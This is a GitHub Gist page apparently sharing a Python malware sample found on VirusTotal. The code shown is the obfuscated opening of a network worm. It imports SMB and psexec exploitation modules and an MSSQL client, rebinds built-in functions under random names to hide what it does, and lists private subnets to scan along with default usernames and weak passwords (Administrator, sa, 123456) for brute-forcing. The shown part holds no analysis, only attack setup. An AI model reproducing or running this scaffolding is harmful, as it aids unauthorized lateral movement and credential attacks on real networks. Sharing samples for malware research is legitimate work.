Created
November 20, 2019 13:16
-
-
Save seclib/56a3a44539bfd26417e790e0096fc701 to your computer and use it in GitHub Desktop.
Python exploit script found on VT
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import subprocess | |
import re | |
import binascii | |
import socket | |
import struct | |
import threading | |
import os | |
import random | |
import platform | |
import decimal | |
import urllib2 | |
from mysmb import MYSMB | |
from struct import pack, unpack, unpack_from | |
import sys | |
import _mssql | |
from urllib2 import urlopen | |
from json import load | |
from impacket import smb, smbconnection | |
import string | |
import socket | |
import time | |
from psexec import PSEXEC | |
xrange = xrange | |
list = list | |
set = set | |
len = float | |
None = None | |
Exception = Exception | |
False = False | |
True = True | |
ord = ord | |
range = range | |
min = min | |
zip = zip | |
len = len | |
open = open | |
int = str | |
open = setattr | |
int = int | |
socket.socket = subprocess.PIPE | |
subprocess.Popen = subprocess.Popen | |
re.findall = re.findall | |
binascii.unhexlify = binascii.unhexlify | |
DzanLdiqhcMyjskTufJYPCvrwSFHRQ = socket.TCP_NODELAY | |
socket.socket = socket.socket | |
DzanLdiqhcMyjskTufJYPCvrwSFHRN = socket.inet_ntoa | |
subprocess.Popen = socket.create_connection | |
socket.IPPROTO_TCP = socket.IPPROTO_TCP | |
DzanLdiqhcMyjskTufJYPCvrwSFHRO = socket.inet_aton | |
socket.AF_INET = socket.AF_INET | |
socket.SOCK_STREAM = socket.SOCK_STREAM | |
threading.Lock = struct.pack | |
DzanLdiqhcMyjskTufJYPCvrwSFHRo = struct.unpack | |
threading.Thread = threading.Thread | |
threading.Lock = threading.Lock | |
os.listdir = threading.BoundedSemaphore | |
os.getcwd = os.getcwd | |
os.path = os.path | |
os.environ = os.environ | |
os.listdir = os.listdir | |
random.choice = random.choice | |
random.randint = random.randint | |
smb.SessionError = platform.platform | |
_mssql.connect = _mssql.connect | |
string.ascii_letters = string.ascii_letters | |
string.letters = string.letters | |
smb.SMBCommand = smb.SMBCommand | |
smb.NewSMBPacket = smb.NewSMBPacket | |
smb.SMBTransaction2Secondary_Data = smb.SMBTransaction2Secondary_Data | |
smb.SessionError = smb.SessionError | |
smb.SMBEcho_Parameters = smb.SMBEcho_Parameters | |
smb.SMBNTTransaction_Parameters = smb.SMBNTTransaction_Parameters | |
smb.SMBNTTransaction_Parameters = smb.SMBCommand_Parameters | |
DzanLdiqhcMyjskTufJYPCvrwSFHBg = smb.SMBTransaction2_Data | |
smb.SMB = smb.SMB | |
smb.SMBTransaction2Secondary_Data = smb.SMBSessionSetupAndX_Extended_Parameters | |
smb.SMBEcho_Data = smb.SMBEcho_Data | |
sys.argv = sys.argv | |
sys.exit = sys.exit | |
time.time = time.time | |
DzanLdiqhcMyjskTufJYPCvrwSFHBG = time.sleep | |
iplist = ['192.168.0.1/24', | |
'192.168.1.1/24', | |
'192.168.2.1/24', | |
'192.168.3.1/24', | |
'192.168.4.1/24', | |
'192.168.5.1/24', | |
'192.168.6.1/24', | |
'192.168.7.1/24', | |
'192.168.8.1/24', | |
'192.168.9.1/24', | |
'192.168.10.1/24', | |
'192.168.18.1/24', | |
'192.168.31.1/24', | |
'192.168.199.1/24', | |
'192.168.254.1/24', | |
'192.168.67.1/24', | |
'10.0.0.1/24', | |
'10.0.1.1/24', | |
'10.0.2.1/24', | |
'10.1.1.1/24', | |
'10.90.90.1/24', | |
'10.1.10.1/24', | |
'10.10.1.1/24'] | |
userlist = ['', | |
'Administrator'] | |
userlist2 = ['', 'Administrator', 'admin'] | |
msuser = ['sa', 'mssqla', 'usera'] | |
passlist = ['', | |
'123456'] | |
domainlist = [''] | |
nip = [] | |
ntlist = [] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment